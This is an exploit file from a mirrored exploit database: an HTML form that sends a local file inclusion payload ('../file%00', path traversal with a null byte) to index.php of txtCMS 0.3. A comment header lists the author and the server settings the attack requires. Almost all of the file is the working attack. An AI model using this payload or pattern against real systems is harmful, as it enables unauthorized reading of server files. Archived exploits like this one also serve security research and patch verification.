exploit-db-mirror/platforms/php/webapps/5579.htm
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

20 lines
510 B
HTML
Executable file

<!--
Name : txtCMS 0.3 (index.php) Local File Inclusion Exploit
Author : cOndemned
Conditions : Register_globals = On / Magic_quotes_gpc = Off
Greetz : irk4z, GregStar, ZaBeaTy, ElusiveN, Avanturka :***
-->
<html>
<head>
<title>txtCMS 0.3 (index.php) Local File Inclusion Exploit</title>
</head>
<body>
<form action="http://target.host/txtcmsv0.3/index.php" method="POST">
<input type="text" name="id" value="../file%00">
<input type="submit" value="show">
</form>
</body>
</html>
# milw0rm.com [2008-05-09]